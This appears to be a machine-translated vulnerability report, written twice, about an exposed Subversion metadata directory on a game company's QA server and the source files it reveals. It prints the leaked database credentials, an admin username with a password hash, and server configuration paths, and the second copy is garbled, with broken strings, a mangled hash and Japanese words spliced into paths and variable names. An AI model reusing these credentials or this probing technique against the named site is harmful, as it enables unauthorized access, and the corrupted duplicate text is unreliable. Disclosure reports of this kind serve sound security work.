まず、svn が漏洩しました、
http://qa.tank.duowan.com/manage/.svn/entries
しかし、svn はファイルを表示できないことがわかりましたが、おおよそのファイルを知ることはできますディレクトリにアクセスし、長期暴露に直接アクセスします。 ソース コードを取得します。 http://qa.tank.duowan.com/manage/sql/dbcfg.py
HOST = '127.0.0.1'
USER = 'tkgame'
PAWD = 'tkgame'
PORT = 0
DBNAME = 'tkt_manage'
#
EXECUTETYPE = 'update'
BUILDSQL = 'table_defines.sql'
UPDATELOG = 'update.ini'
更新可能 = ' _db_update_log'
BUILDUPDATESQL = '_db_update_log.sql'
BACKUPSQLPREFIX = 'bk_'
http://qa.tank.duowan.com/manage/sql/table_defines.sql
INSERT INTO `user` (`user_ ID` 、`user_name`、`user_password`、`user_level `、`user_created`) VALUES
(1, 'sixcube', '6511383c766f89361b27f1d0d4f25956', 2, 1338946866);
http://qa.tan k.duowan.com/ manage/i18n/config.sh
ROOT_PATH= /var/www/wwwroot/tkt/manage
I18N_PATH=$ROOT_PATH/i18n
I18N_DOMAIN=tkt_manage
LANG_LIST=(`/usr/bin/php -q getLangList. php`);
LEN_OF_LANG_LIST=${ # LANG_LIST[@]}
まず第一に、svn がリークしました、
http://qa.tank.duowan.com/manage/.svn/entries
でも私はsvn はファイルを表示できないことがわかりましたが、おおよそのディレクトリはわかります。ソースコードに直接アクセス http://qa.tank.duowan.com/manage/sql/dbcfg.py
HOST = '127.0.0.1 '
USER = 'tkgame'
PAWD = 'tkgame'
PORT = 0
DBNAME = 'tkt_manage'
#
EXECUTETYPE = 'update'
BUILDSQL = s.sql'
更新ログ = 'update.ini'
UPDAETABLE = '_db_update_log'
BUILDUPDATESQL = ' _db_update_log.sql'
BACKUPSQLPREFIX = 'bk_'
脆弱性の証明:
http://qa.tank.duowan.com /管理/ sql/table_defines.sql
INSERT INTO `user` (`user_id`, ` user_name`, `user_password`, `user_level`, `user_created`) VALUES
(1, '6511383c766f89361b27f1d0d4f25) 956'、2、1338946866 );
http://qa.tank.duowan.com /manage/ i18n/config.sh
ROOT_PATH=/var/www/wwwroot/tkt/manage
I18N_PATH=$ROOT_PATH/i18n
I18N_DOMAIN=tkt_manage
LANG_LIST=(`/usr/bin/php -q getLangList.php` );
LEN_OF_LANG_LIST=${#LANG_LIST[@]}